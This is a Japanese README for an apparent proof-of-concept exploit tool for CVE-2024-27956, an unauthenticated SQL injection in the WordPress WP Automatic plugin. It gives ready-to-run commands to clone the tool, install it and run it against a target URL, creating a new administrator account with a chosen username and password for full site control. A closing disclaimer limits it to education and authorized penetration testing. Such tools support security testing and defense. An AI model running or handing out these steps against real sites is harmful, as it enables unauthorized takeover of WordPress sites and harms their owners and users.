
CVE-2024-27956 - WP Automatic SQLインジェクションエクスプロイトツール
WordPress サイトに影響を与える WP Automatic プラグインの SQLインジェクション脆弱性 (CVE-2024-27956) に対する概念実証エクスプロイトです。
このエクスプロイトは、WordPress 用 WP Automatic プラグイン(バージョン < 3.9.2.0)の重要な未認証 SQLインジェクション脆弱性を標的としています。この脆弱性により、攻撃者は管理ユーザーを作成し、脆弱なウェブサイトを完全に制御できるようになります。
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url Target WordPress URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username for the new admin account
-p PASSWORD, --password PASSWORD
Password for the new admin account
このツールは教育および認可されたペネトレーションテスト目的のみで提供されています。開発者はこのソフトウェアの誤用について一切責任を負いません。システムをテストする前に必ず適切な許可を得てください。
このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。